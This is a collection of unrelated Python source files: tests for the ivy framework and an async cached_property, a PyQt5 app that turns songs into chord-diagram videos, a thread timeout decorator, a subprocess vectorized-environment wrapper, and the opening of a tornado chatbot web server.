    assert ivy.to_numpy(first).item() != ivy.to_numpy(fresh).item()
    assert first is second
    assert first is not fresh
def test_cache_fn_with_args(dev, call):
    """ivy.cache_fn must key its memoization on the call arguments."""
    def func(_):
        return ivy.random_uniform()
    # same argument -> same cached object; different argument -> fresh value
    cached_fn = ivy.cache_fn(func)
    first = cached_fn(0)
    second = cached_fn(0)
    other = cached_fn(1)
    assert ivy.to_numpy(first).item() == ivy.to_numpy(second).item()
    assert ivy.to_numpy(first).item() != ivy.to_numpy(other).item()
    assert first is second
    assert first is not other
    # repeated wrappings of the same function share the same global cache dict
    first = ivy.cache_fn(func)(0)
    second = ivy.cache_fn(func)(0)
    other = ivy.cache_fn(func)(1)
    assert ivy.to_numpy(first).item() == ivy.to_numpy(second).item()
    assert ivy.to_numpy(first).item() != ivy.to_numpy(other).item()
    assert first is second
    assert first is not other
# def test_framework_setting_with_threading(dev, call):
#
# if call is helpers.np_call:
# # Numpy is the conflicting framework being tested against
# pytest.skip()
#
# def thread_fn():
# ivy.set_framework('numpy')
# x_ = np.array([0., 1., 2.])
# for _ in range(2000):
# try:
# ivy.reduce_mean(x_)
# except TypeError:
# return False
# ivy.unset_framework()
# return True
#
# # get original framework string and array
# fws = ivy.current_framework_str()
# x = ivy.array([0., 1., 2.])
#
# # start numpy loop thread
# thread = threading.Thread(target=thread_fn)
# thread.start()
#
# # start local original framework loop
# ivy.set_framework(fws)
# for _ in range(2000):
# ivy.reduce_mean(x)
# ivy.unset_framework()
#
# assert not thread.join()
def test_framework_setting_with_multiprocessing(dev, call):
    """The global framework setting must not leak between processes: a worker
    running on the numpy backend must not break the parent's framework loop.
    """
    if call is helpers.np_call:
        # Numpy is the conflicting framework being tested against
        pytest.skip()
    def worker_fn(out_queue):
        # worker pins numpy and hammers a numpy array; a TypeError would mean
        # the parent's framework setting bled into this process
        ivy.set_framework('numpy')
        x_ = np.array([0., 1., 2.])
        for _ in range(1000):
            try:
                ivy.mean(x_)
            except TypeError:
                out_queue.put(False)
                return
        ivy.unset_framework()
        out_queue.put(True)
    # get original framework string and array
    fws = ivy.current_framework_str()
    x = ivy.array([0., 1., 2.])
    # start the numpy worker process
    output_queue = multiprocessing.Queue()
    worker = multiprocessing.Process(target=worker_fn, args=(output_queue,))
    worker.start()
    # start local original framework loop in parallel with the worker
    ivy.set_framework(fws)
    for _ in range(1000):
        ivy.mean(x)
    ivy.unset_framework()
    worker.join()
    # worker reports True only if its numpy loop ran clean
    assert output_queue.get_nowait()
# def test_explicit_ivy_framework_handles(dev, call):
#
# if call is helpers.np_call:
# # Numpy is the conflicting framework being tested against
# pytest.skip()
#
# # store original framework string and unset
# fw_str = ivy.current_framework_str()
# ivy.unset_framework()
#
# # set with explicit handle caught
# ivy_exp = ivy.get_framework(fw_str)
# assert ivy_exp.current_framework_str() == fw_str
#
# # assert backend implemented function is accessible
# assert 'array' in ivy_exp.__dict__
# assert callable(ivy_exp.array)
#
# # assert joint implemented function is also accessible
# assert 'cache_fn' in ivy_exp.__dict__
# assert callable(ivy_exp.cache_fn)
#
# # set global ivy to numpy
# ivy.set_framework('numpy')
#
# # assert the explicit handle is still unchanged
# assert ivy.current_framework_str() == 'numpy'
# assert ivy_exp.current_framework_str() == fw_str
#
# # unset global ivy from numpy
# ivy.unset_framework()
# def test_class_ivy_handles(dev, call):
#
# if call is helpers.np_call:
# # Numpy is the conflicting framework being tested against
# pytest.skip()
#
# class ArrayGen:
#
# def __init__(self, ivyh):
# self._ivy = ivyh
#
# def get_array(self):
# return self._ivy.array([0., 1., 2.])
#
# # create instance
# ag = ArrayGen(ivy.get_framework())
#
# # create array from array generator
# x = ag.get_array()
#
# # verify this is not a numpy array
# assert not isinstance(x, np.ndarray)
#
# # change global framework to numpy
# ivy.set_framework('numpy')
#
# # create another array from array generator
# x = ag.get_array()
#
# # verify this is not still a numpy array
# assert not isinstance(x, np.ndarray)
# einops_rearrange
@pytest.mark.parametrize(
    "x_n_pattern_n_newx", [([[0., 1., 2., 3.]], 'b n -> n b', [[0.], [1.], [2.], [3.]])])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_rearrange(x_n_pattern_n_newx, dtype, tensor_fn, dev, call):
    """ivy.einops_rearrange must match einops.rearrange on the native array."""
    # smoke test
    x, pattern, _ = x_n_pattern_n_newx
    x = tensor_fn(x, dtype, dev)
    ret = ivy.einops_rearrange(x, pattern)
    reference = einops.rearrange(ivy.to_native(x), pattern)
    # type test
    assert ivy.is_native_array(ret)
    # cardinality test
    assert list(ret.shape) == list(reference.shape)
    # value test
    assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(reference))
# einops_reduce
@pytest.mark.parametrize(
    "x_n_pattern_n_red_n_newx", [([[0., 1., 2., 3.]], 'b n -> b', 'mean', [1.5])])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_reduce(x_n_pattern_n_red_n_newx, dtype, tensor_fn, dev, call):
    """ivy.einops_reduce must match einops.reduce on the native array."""
    # smoke test
    x, pattern, reduction, _ = x_n_pattern_n_red_n_newx
    x = tensor_fn(x, dtype, dev)
    ret = ivy.einops_reduce(x, pattern, reduction)
    reference = einops.reduce(ivy.to_native(x), pattern, reduction)
    # type test
    assert ivy.is_native_array(ret)
    # cardinality test
    assert list(ret.shape) == list(reference.shape)
    # value test
    assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(reference))
# einops_repeat
@pytest.mark.parametrize(
    "x_n_pattern_n_al_n_newx", [([[0., 1., 2., 3.]], 'b n -> b n c', {'c': 2},
                                 [[[0., 0.], [1., 1.], [2., 2.], [3., 3.]]])])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_repeat(x_n_pattern_n_al_n_newx, dtype, tensor_fn, dev, call):
    """ivy.einops_repeat must match einops.repeat on the native array."""
    # smoke test
    x, pattern, axes_lengths, _ = x_n_pattern_n_al_n_newx
    x = tensor_fn(x, dtype, dev)
    ret = ivy.einops_repeat(x, pattern, **axes_lengths)
    reference = einops.repeat(ivy.to_native(x), pattern, **axes_lengths)
    # type test
    assert ivy.is_native_array(ret)
    # cardinality test
    assert list(ret.shape) == list(reference.shape)
    # value test
    assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(reference))
# profiler
# def test_profiler(dev, call):
#
# # ToDo: find way to prevent this test from hanging when run alongside other tests in parallel
#
# # log dir
# this_dir = os.path.dirname(os.path.realpath(__file__))
# log_dir = os.path.join(this_dir, '../log')
#
# # with statement
# with ivy.Profiler(log_dir):
# a = ivy.ones([10])
# b = ivy.zeros([10])
# a + b
# if call is helpers.mx_call:
# time.sleep(1) # required by MXNet for some reason
#
# # start and stop methods
# profiler = ivy.Profiler(log_dir)
# profiler.start()
# a = ivy.ones([10])
# b = ivy.zeros([10])
# a + b
# profiler.stop()
# if call is helpers.mx_call:
# time.sleep(1) # required by MXNet for some reason
# container types
def test_container_types(dev, call):
    """Every registered container type must expose a dict-like interface."""
    registered = ivy.container_types()
    assert isinstance(registered, list)
    for candidate in registered:
        for required_attr in ('keys', 'values', 'items'):
            assert hasattr(candidate, required_attr)
def test_inplace_arrays_supported(dev, call):
    """Inplace array support must match the per-framework expectation."""
    fw = ivy.current_framework_str()
    expected = {'numpy': True, 'mxnet': True, 'torch': True,
                'jax': False, 'tensorflow': False}
    if fw not in expected:
        raise Exception('Unrecognized framework')
    if expected[fw]:
        assert ivy.inplace_arrays_supported()
    else:
        assert not ivy.inplace_arrays_supported()
def test_inplace_variables_supported(dev, call):
    """Inplace variable support must match the per-framework expectation."""
    fw = ivy.current_framework_str()
    expected = {'numpy': True, 'mxnet': True, 'torch': True,
                'tensorflow': True, 'jax': False}
    if fw not in expected:
        raise Exception('Unrecognized framework')
    if expected[fw]:
        assert ivy.inplace_variables_supported()
    else:
        assert not ivy.inplace_variables_supported()
# @pytest.mark.parametrize(
# "x_n_new", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_inplace_update(x_n_new, tensor_fn, dev, call):
# x_orig, new_val = x_n_new
# if call is helpers.mx_call and isinstance(x_orig, Number):
# # MxNet supports neither 0-dim variables nor 0-dim inplace updates
# pytest.skip()
# x_orig = tensor_fn(x_orig, 'float32', dev)
# new_val = tensor_fn(new_val, 'float32', dev)
# if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
# (tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
# x = ivy.inplace_update(x_orig, new_val)
# assert id(x) == id(x_orig)
# assert np.allclose(ivy.to_numpy(x), ivy.to_numpy(new_val))
# return
# pytest.skip()
# @pytest.mark.parametrize(
# "x_n_dec", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_inplace_decrement(x_n_dec, tensor_fn, dev, call):
# x_orig, dec = x_n_dec
# if call is helpers.mx_call and isinstance(x_orig, Number):
# # MxNet supports neither 0-dim variables nor 0-dim inplace updates
# pytest.skip()
# x_orig = tensor_fn(x_orig, 'float32', dev)
# dec = tensor_fn(dec, 'float32', dev)
# new_val = x_orig - dec
# if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
# (tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
# x = ivy.inplace_decrement(x_orig, dec)
# assert id(x) == id(x_orig)
# assert np.allclose(ivy.to_numpy(new_val), ivy.to_numpy(x))
# return
# pytest.skip()
# @pytest.mark.parametrize(
# "x_n_inc", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_inplace_increment(x_n_inc, tensor_fn, dev, call):
# x_orig, inc = x_n_inc
# if call is helpers.mx_call and isinstance(x_orig, Number):
# # MxNet supports neither 0-dim variables nor 0-dim inplace updates
# pytest.skip()
# x_orig = tensor_fn(x_orig, 'float32', dev)
# inc = tensor_fn(inc, 'float32', dev)
# new_val = x_orig + inc
# if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
# (tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
# x = ivy.inplace_increment(x_orig, inc)
# assert id(x) == id(x_orig)
# assert np.allclose(ivy.to_numpy(new_val), ivy.to_numpy(x))
# return
# pytest.skip()
|
test_async_cached_property.py | # -*- coding: utf-8 -*-
import asyncio
import time
import unittest
from threading import Lock, Thread
from freezegun import freeze_time
import cached_property
def unittest_run_loop(f):
    """Decorator that runs async test method *f* to completion on an event loop.

    Bug fix: ``asyncio.coroutine`` was removed in Python 3.11, so native
    ``async def`` functions are detected and called directly; the legacy
    wrapper is only applied to generator-based callables on old interpreters.
    """
    def wrapper(*args, **kwargs):
        if asyncio.iscoroutinefunction(f):
            future = f(*args, **kwargs)
        else:
            # legacy generator-based coroutine path (pre-3.11 only)
            future = asyncio.coroutine(f)(*args, **kwargs)
        try:
            loop = asyncio.get_event_loop()
        except RuntimeError:
            # No current event loop in this thread (3.10+): create one.
            loop = asyncio.new_event_loop()
            asyncio.set_event_loop(loop)
        loop.run_until_complete(future)
    return wrapper
def CheckFactory(cached_property_decorator, threadsafe=False):
    """
    Create dynamically a Check class whose add_cached method is decorated by
    the cached_property_decorator.
    """

    class Check(object):
        def __init__(self):
            self.control_total = 0  # bumped on every add_control() call
            self.cached_total = 0  # bumped only when add_cached actually runs
            self.lock = Lock()

        async def add_control(self):
            # Uncached counterpart of add_cached: always increments.
            self.control_total += 1
            return self.control_total

        @cached_property_decorator
        async def add_cached(self):
            if threadsafe:
                # Sleep so concurrent threads overlap inside this body,
                # exposing caches that are not thread-safe.
                time.sleep(1)
                # Need to guard this since += isn't atomic.
                with self.lock:
                    self.cached_total += 1
            else:
                self.cached_total += 1
            return self.cached_total

        def run_threads(self, num_threads):
            # Access add_cached concurrently from num_threads threads, each
            # with its own event loop, then wait for all of them to finish.
            threads = []
            for _ in range(num_threads):
                def call_add_cached():
                    loop = asyncio.new_event_loop()
                    asyncio.set_event_loop(loop)
                    loop.run_until_complete(self.add_cached)
                thread = Thread(target=call_add_cached)
                thread.start()
                threads.append(thread)
            for thread in threads:
                thread.join()

    return Check
class TestCachedProperty(unittest.TestCase):
    """Tests for cached_property"""

    # Decorator under test; subclasses may override it to reuse the same
    # assertions against other cached_property variants.
    cached_property_factory = cached_property.cached_property

    async def assert_control(self, check, expected):
        """
        Assert that both `add_control` and 'control_total` equal `expected`
        """
        self.assertEqual(await check.add_control(), expected)
        self.assertEqual(check.control_total, expected)

    async def assert_cached(self, check, expected):
        """
        Assert that both `add_cached` and 'cached_total` equal `expected`
        """
        print("assert_cached", check.add_cached)
        self.assertEqual(await check.add_cached, expected)
        self.assertEqual(check.cached_total, expected)

    @unittest_run_loop
    async def test_cached_property(self):
        """The cached value is computed once and then served from cache."""
        Check = CheckFactory(self.cached_property_factory)
        check = Check()
        # The control shows that we can continue to add 1
        await self.assert_control(check, 1)
        await self.assert_control(check, 2)
        # The cached version demonstrates how nothing is added after the first
        await self.assert_cached(check, 1)
        await self.assert_cached(check, 1)
        # The cache does not expire
        with freeze_time("9999-01-01"):
            await self.assert_cached(check, 1)
        # Typically descriptors return themselves if accessed though the class
        # rather than through an instance.
        self.assertTrue(isinstance(Check.add_cached, self.cached_property_factory))

    @unittest_run_loop
    async def test_reset_cached_property(self):
        """Deleting the attribute clears the cache; next access recomputes."""
        Check = CheckFactory(self.cached_property_factory)
        check = Check()
        # Run standard cache assertion
        await self.assert_cached(check, 1)
        await self.assert_cached(check, 1)
        # Clear the cache
        del check.add_cached
        # Value is cached again after the next access
        await self.assert_cached(check, 2)
        await self.assert_cached(check, 2)

    @unittest_run_loop
    async def test_none_cached_property(self):
        """A cached value of None is still considered a valid cached result."""
        class Check(object):
            def __init__(self):
                self.cached_total = None

            @self.cached_property_factory
            async def add_cached(self):
                return self.cached_total

        await self.assert_cached(Check(), None)
|
gui.py | import os
import threading
from pathlib import Path
from zipfile import ZipFile
import cv2
import tensorflow as tf
from moviepy.audio.io.AudioFileClip import AudioFileClip
from moviepy.video.io.VideoFileClip import VideoFileClip
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtCore import QRect, QSize, Qt, QUrl, pyqtSignal
from PyQt5.QtGui import QBrush, QColor, QIcon, QImage, QPalette
from PyQt5.QtMultimedia import QMediaContent, QMediaPlayer
from PyQt5.QtMultimediaWidgets import QVideoWidget
from PyQt5.QtWidgets import (QAction, QFileDialog, QHBoxLayout, QLabel,
QMainWindow, QMenuBar, QPushButton, QSizePolicy,
QVBoxLayout, QWidget)
from functions import create_onset_info, read_song
from modelPredict import model_predict
from settings import MODEL_PATH, SONG_DURATION
class MainWindow(QMainWindow):
    """Guitario main window.

    Lets the user pick a wav/mp3 song, generates a chord-diagram video for it
    (model prediction runs on a background thread), and plays the result back
    through a QMediaPlayer with standard transport controls.
    """

    class EventWindow(QMainWindow):
        # Detached video-viewer window; emits ``state`` False when the user
        # closes it so the owner can react.
        state = pyqtSignal(bool)

        def closeEvent(self, e):
            self.state.emit(False)

    @staticmethod
    def hhmmss(ms):
        """Format *ms* milliseconds as hh:mm:ss, or mm:ss below one hour."""
        h, r = divmod(ms, 3600000)  # 60*60*1000 (bug fix: was 360000, 10x off)
        m, r = divmod(r, 60000)  # 60*1000
        s, _ = divmod(r, 1000)  # 1000
        # Bug fix: show the hour field when there is at least one hour (the
        # condition previously tested minutes).
        return ("%02d:%02d:%02d" % (h, m, s)) if h else ("%02d:%02d" % (m, s))

    def setupUi(self, MainWindow):
        """Build all widgets, layouts and the menu bar for *MainWindow*."""
        self.sizeWin = QSize(640, 360)
        self.setMinimumSize(self.sizeWin)
        self.central_widget = QWidget(MainWindow)
        size_policy = QSizePolicy(QSizePolicy.MinimumExpanding, QtWidgets.QSizePolicy.Maximum)
        size_policy.setHeightForWidth(
            self.central_widget.sizePolicy().hasHeightForWidth())
        self.central_widget.setSizePolicy(size_policy)
        self.horizontal_layout = QHBoxLayout(self.central_widget)
        self.horizontal_layout.setContentsMargins(11, 11, 11, 11)
        self.vertical_layout = QVBoxLayout()
        self.horizontal_layout_4 = QHBoxLayout()
        # Always-on-top child window that hosts the video output.
        self.viewer = self.EventWindow(self)
        self.viewer.setWindowFlags(
            self.viewer.windowFlags() | Qt.WindowStaysOnTopHint)
        self.viewer.setMinimumSize(self.sizeWin)
        self.vertical_layout.addWidget(self.viewer)
        # Elapsed-time label | seek slider | total-time label.
        self.currentTimeLabel = QLabel(self.central_widget)
        self.currentTimeLabel.setMinimumSize(QSize(80, 0))
        self.currentTimeLabel.setAlignment(
            Qt.AlignRight | Qt.AlignTrailing | Qt.AlignVCenter)
        self.horizontal_layout_4.addWidget(self.currentTimeLabel)
        self.timeSlider = QtWidgets.QSlider(self.central_widget)
        self.timeSlider.setOrientation(QtCore.Qt.Horizontal)
        self.horizontal_layout_4.addWidget(self.timeSlider)
        self.totalTimeLabel = QtWidgets.QLabel(self.central_widget)
        self.totalTimeLabel.setMinimumSize(QtCore.QSize(80, 0))
        self.totalTimeLabel.setAlignment(
            QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)
        self.horizontal_layout_4.addWidget(self.totalTimeLabel)
        self.vertical_layout.addLayout(self.horizontal_layout_4)
        # Transport buttons (play/pause/stop) and volume control.
        self.horizontal_layout_5 = QtWidgets.QHBoxLayout()
        self.horizontal_layout_5.setSpacing(6)
        self.play_button = QPushButton(QIcon("guiIcons/control.png"), "", self)
        self.horizontal_layout_5.addWidget(self.play_button)
        self.pause_button = QPushButton(QIcon("guiIcons/control-pause.png"), "", self)
        self.horizontal_layout_5.addWidget(self.pause_button)
        self.stopButton = QPushButton(QIcon("guiIcons/control-stop-square.png"), "", self)
        self.horizontal_layout_5.addWidget(self.stopButton)
        spacerItem = QtWidgets.QSpacerItem(
            40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        self.horizontal_layout_5.addItem(spacerItem)
        self.label = QtWidgets.QLabel(self.central_widget)
        self.label.setPixmap(QtGui.QPixmap("guiIcons/speaker-volume.png"))
        self.horizontal_layout_5.addWidget(self.label)
        self.volumeSlider = QtWidgets.QSlider(self.central_widget)
        self.volumeSlider.setMaximum(100)
        self.volumeSlider.setProperty("value", 100)
        self.volumeSlider.setOrientation(QtCore.Qt.Horizontal)
        self.horizontal_layout_5.addWidget(self.volumeSlider)
        self.vertical_layout.addLayout(self.horizontal_layout_5)
        self.horizontal_layout.addLayout(self.vertical_layout)
        MainWindow.setCentralWidget(self.central_widget)
        # Menu bar with a single "open file" action.
        self.menuBar = QMenuBar(MainWindow)
        self.menuBar.setGeometry(QRect(0, 0, 484, 22))
        self.menuFIle = QtWidgets.QMenu(self.menuBar)
        MainWindow.setMenuBar(self.menuBar)
        self.open_file_action = QAction(QIcon(
            "guiIcons\\directory.png"), "&Choose audio file in wav or mp3 format", self)
        self.menuFIle.addAction(self.open_file_action)
        self.menuBar.addAction(self.menuFIle.menuAction())
        self.currentTimeLabel.setText("0:00")
        self.totalTimeLabel.setText("0:00")
        self.menuFIle.setTitle("Open audio file")
        self.open_file_action.setText("Open audio file")

    def __init__(self):
        super(MainWindow, self).__init__()
        self.setWindowTitle("Guitario")
        self.setWindowIcon(QIcon('guiIcons\\music.png'))
        self.sizeWin = QSize(480, 360)
        self.setMinimumSize(self.sizeWin)
        # Fusion palette, all thanks to author, https://gist.github.com/QuantumCD/6245215
        palette = QPalette()
        palette.setColor(QPalette.Window, QColor(53, 53, 53))
        palette.setColor(QPalette.WindowText, Qt.white)
        palette.setColor(QPalette.Base, QColor(25, 25, 25))
        palette.setColor(QPalette.AlternateBase, QColor(53, 53, 53))
        palette.setColor(QPalette.ToolTipBase, Qt.white)
        palette.setColor(QPalette.ToolTipText, Qt.white)
        palette.setColor(QPalette.Text, Qt.white)
        palette.setColor(QPalette.Button, QColor(53, 53, 53))
        palette.setColor(QPalette.ButtonText, Qt.white)
        palette.setColor(QPalette.BrightText, Qt.red)
        palette.setColor(QPalette.Link, QColor(42, 130, 218))
        palette.setColor(QPalette.Highlight, QColor(42, 130, 218))
        palette.setColor(QPalette.HighlightedText, Qt.black)
        oImage = QImage("guiIcons\\guitarWallPaper.png")
        sImage = oImage.scaled(self.sizeWin)
        palette.setBrush(QPalette.Background, QBrush(sImage))
        self.setPalette(palette)
        self.setupUi(self)
        # Setup QMediaPlayer
        self.player = QMediaPlayer(None, QMediaPlayer.VideoSurface)
        self.player.error.connect(self.erroralert)
        videoWidget = QVideoWidget()
        self.viewer.setCentralWidget(videoWidget)
        self.player.setVideoOutput(videoWidget)
        # Connect control buttons/slides for QMediaPlayer
        self.play_button.pressed.connect(self.player.play)
        self.pause_button.pressed.connect(self.player.pause)
        self.stopButton.pressed.connect(self.player.stop)
        self.volumeSlider.valueChanged.connect(self.player.setVolume)
        self.player.durationChanged.connect(self.update_duration)
        self.player.positionChanged.connect(self.update_position)
        self.timeSlider.valueChanged.connect(self.player.setPosition)
        self.open_file_action.triggered.connect(self.open_file)
        #! LOADING MODEL
        self.working = False
        # Bug fix: update_duration/update_position read self.loading on every
        # player signal, but it was first assigned only inside song_thread,
        # so early signals raised AttributeError.
        self.loading = False
        threading.Thread(target=self.load_model).start()

    def update_duration(self, duration):
        """Player signal handler: resize the seek slider and total-time label."""
        self.timeSlider.setMaximum(duration)
        if duration >= 0 and not self.loading:
            self.totalTimeLabel.setText(self.hhmmss(duration))

    def update_position(self, position):
        """Player signal handler: move the seek slider without re-triggering it."""
        if not self.loading:
            if position >= 0:
                self.currentTimeLabel.setText(self.hhmmss(position))
            # Disable the events to prevent updating triggering a setPosition event
            self.timeSlider.blockSignals(True)
            self.timeSlider.setValue(position)
            self.timeSlider.blockSignals(False)

    def toggle_viewer(self, state):
        """Show or hide the video viewer window."""
        if state:
            self.viewer.show()
        else:
            self.viewer.hide()

    def extract_ziped_model(self):
        """Unpack the bundled model zip on first run, then delete the archive."""
        with ZipFile(MODEL_PATH + '.zip', 'r') as zip:
            print('Extracting model files! (first time program runs)')
            zip.extractall('models')
            print('Extracting model from zip file finished! (first time program runs)')
        os.remove(MODEL_PATH + '.zip')

    def load_model(self):
        """Load the Keras chord model (runs on a background thread)."""
        print("Loading model!")
        if not os.path.isdir(MODEL_PATH):
            self.extract_ziped_model()
        self.model = tf.keras.models.load_model(MODEL_PATH)
        print("Ready to load the song!")

    def song_thread(self):
        """Background worker: detect onsets, predict chords, render the video."""
        self.working = True
        self.timeSlider.blockSignals(True)
        self.loading = True
        # Show a placeholder while the song is being processed.
        self.player.setMedia(QMediaContent(
            QUrl.fromLocalFile("guiIcons\\loading.gif")))
        self.viewer.setVisible(True)
        self.player.play()  # bug fix: method was referenced, not called
        print("Creating chords for song ", self.song)
        print("Please wait!")
        detection_list, duration_list = create_onset_info(
            self.song, SONG_DURATION, False)
        prediction_list = model_predict(self.model, detection_list)
        print("Found chord: ", prediction_list)
        # output frame resolution for video
        image_shape = (200, 300)
        # creating folder saved_accords if it does not exist
        Path("saved_accords").mkdir(parents=True, exist_ok=True)
        #! using cv2 to create videoClip
        VIDEO_FPS = 60
        VIDEO_PATH = "saved_accords\\" + os.path.basename(self.song[:-4])
        VIDEO_PATH_AVI = VIDEO_PATH + "_GENERATED.avi"
        out = cv2.VideoWriter(VIDEO_PATH_AVI, cv2.VideoWriter_fourcc(
            'M', 'J', 'P', 'G'), VIDEO_FPS, image_shape)
        timer = 0.0
        time_adder = 1 / VIDEO_FPS
        # Write each chord's diagram for as many frames as the chord lasts.
        for i in range(len(detection_list)):
            chord_image_path = "Guitar chords\\" + prediction_list[i] + '.png'
            chord_end = timer + duration_list[i]
            img = cv2.imread(chord_image_path)
            img = cv2.resize(img, image_shape, interpolation=cv2.INTER_AREA)
            while timer <= chord_end:
                out.write(img)
                timer += time_adder
        out.release()
        # adding sound to clip
        video = VideoFileClip(VIDEO_PATH_AVI, audio=False)
        audio = AudioFileClip(self.song)
        final = video.set_audio(audio)
        final.write_videofile(VIDEO_PATH + ".mp4", codec='mpeg4',
                              audio_codec='libvorbis', fps=VIDEO_FPS)
        self.player.stop()  # bug fix: method was referenced, not called
        self.loading = False
        self.player.setMedia(QMediaContent(
            QUrl.fromLocalFile(VIDEO_PATH + ".mp4")))
        self.timeSlider.blockSignals(False)
        self.player.play()  # bug fix: method was referenced, not called
        os.remove(VIDEO_PATH_AVI)
        self.working = False

    def open_file(self):
        """Menu action: pick a wav/mp3 file and start processing it."""
        path, _ = QFileDialog.getOpenFileName(
            self, "Open file", "", "wav or mp3 files (*.wav *.mp3)")
        if path != "" and not self.working:
            self.song = read_song(path)
            if self.song is not None:
                threading.Thread(target=self.song_thread).start()

    def erroralert(self, *args):
        """QMediaPlayer error callback: dump the error details to stdout."""
        print(args)
|
utilities.py | """Utility functions for PyNLPIR unit tests."""
import functools
from threading import Thread
def timeout(timeout):
    """Executes a function call or times out after *timeout* seconds.

    Inspired by: http://stackoverflow.com/a/21861599.

    Example:
        func = timeout(timeout=1)(open)
        try:
            func('test.txt')
        except RuntimeError:
            print('open() timed out.')
    """
    def deco(func):
        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            # Holds the return value, a RuntimeError raised by func, or the
            # default timeout error below if the worker never finishes.
            outcome = [RuntimeError('function {0} timeout'.format(func.__name__))]

            def runner():
                try:
                    outcome[0] = func(*args, **kwargs)
                except RuntimeError as exc:
                    outcome[0] = exc

            worker = Thread(target=runner)
            worker.daemon = True  # don't keep the process alive on timeout
            try:
                worker.start()
                worker.join(timeout)
            except Exception as start_err:
                print('Error starting thread')
                raise start_err
            result = outcome[0]
            if isinstance(result, BaseException):
                raise result
            return result
        return wrapper
    return deco
|
subproc_vec_env.py | import numpy as np
from multiprocessing import Process, Pipe
from src.common.vec_env import VecEnv
def worker(remote, env_fn_wrapper):
    """Child-process loop: build the env and service commands from *remote*."""
    env = env_fn_wrapper.x()
    while True:
        cmd, payload = remote.recv()
        if cmd == 'step':
            obs, rew, done, info = env.step(payload)
            # Auto-reset so the caller always receives a valid observation.
            if done:
                obs = env.reset()
            remote.send((obs, rew, done, info))
        elif cmd == 'reset':
            remote.send(env.reset())
        elif cmd == 'close':
            remote.close()
            break
        elif cmd == 'get_spaces':
            remote.send((env.action_space, env.observation_space))
        else:
            raise NotImplementedError
class CloudpickleWrapper(object):
    """
    Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
    """

    def __init__(self, x):
        # Public attribute: worker() reads env_fn_wrapper.x directly.
        self.x = x

    def __getstate__(self):
        # Serialize with cloudpickle so lambdas/closures survive pickling.
        import cloudpickle
        return cloudpickle.dumps(self.x)

    def __setstate__(self, state):
        # cloudpickle output is readable by the plain pickle module.
        import pickle
        self.x = pickle.loads(state)
class SubprocVecEnv(VecEnv):
    """Vectorized env running each sub-env in its own process (see worker)."""

    def __init__(self, env_fns):
        """
        envs: list of gym environments to run in subprocesses
        """
        nenvs = len(env_fns)
        # One pipe per env: the parent keeps `remotes`, children get
        # `work_remotes`.
        self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
        self.ps = [Process(target=worker, args=(work_remote, CloudpickleWrapper(env_fn)))
                   for (work_remote, env_fn) in zip(self.work_remotes, env_fns)]
        for p in self.ps:
            p.start()
        # All envs are assumed identical, so spaces are queried from the
        # first worker only.
        self.remotes[0].send(('get_spaces', None))
        self.action_space, self.observation_space = self.remotes[0].recv()

    def step(self, actions):
        # Broadcast one action per env, then gather results in order
        # (blocks until every worker has replied).
        for remote, action in zip(self.remotes, actions):
            remote.send(('step', action))
        results = [remote.recv() for remote in self.remotes]
        obs, rews, dones, infos = zip(*results)
        return np.stack(obs), np.stack(rews), np.stack(dones), infos

    def reset(self):
        for remote in self.remotes:
            remote.send(('reset', None))
        return np.stack([remote.recv() for remote in self.remotes])

    def close(self):
        # Ask every worker to exit its loop, then reap the processes.
        for remote in self.remotes:
            remote.send(('close', None))
        for p in self.ps:
            p.join()

    @property
    def num_envs(self):
        return len(self.remotes)
|
server.py | import os
import yaml
import json
import time
import base64
import random
import hashlib
import asyncio
import requests
import markdown
import threading
import subprocess
import tornado.web
import tornado.ioloop
import tornado.options
import tornado.httpserver
from tools import make_json, solr_tools
from robot import config, utils, logging, Updater, constants
logger = logging.getLogger(__name__)
# Shared state populated by start_server(); read by the handlers below.
conversation, wukong = None, None
commiting = False
# Example queries shown on the landing page (one is picked at random).
suggestions = [
    "现在几点",
    "你吃饭了吗",
    "上海的天气",
    "写一首关于大海的诗",
    "来玩成语接龙",
    "我有多少邮件",
    "你叫什么名字",
    "讲个笑话",
]
class BaseHandler(tornado.web.RequestHandler):
    """Shared authentication helpers for all request handlers."""

    def isValidated(self):
        # Logged in iff the secure cookie equals the configured token.
        cookie = self.get_secure_cookie("validation")
        if not cookie:
            return False
        return str(cookie, encoding="utf-8") == config.get("/server/validate", "")

    def validate(self, validation):
        # Strip stray double quotes that some clients wrap around the token.
        if '"' in validation:
            validation = validation.replace('"', "")
        expected = config.get("/server/validate", "")
        return validation == expected or validation == str(self.get_cookie("validation"))
class MainHandler(BaseHandler):
    """Landing page: update info, a random suggestion, and any notices."""

    def get(self):
        global conversation, wukong, suggestions
        if not self.isValidated():
            self.redirect("/login")
            return
        if conversation:
            # Fetch update/notice info for the current device channel.
            info = Updater.fetch(wukong._dev)
            suggestion = random.choice(suggestions)
            notices = None
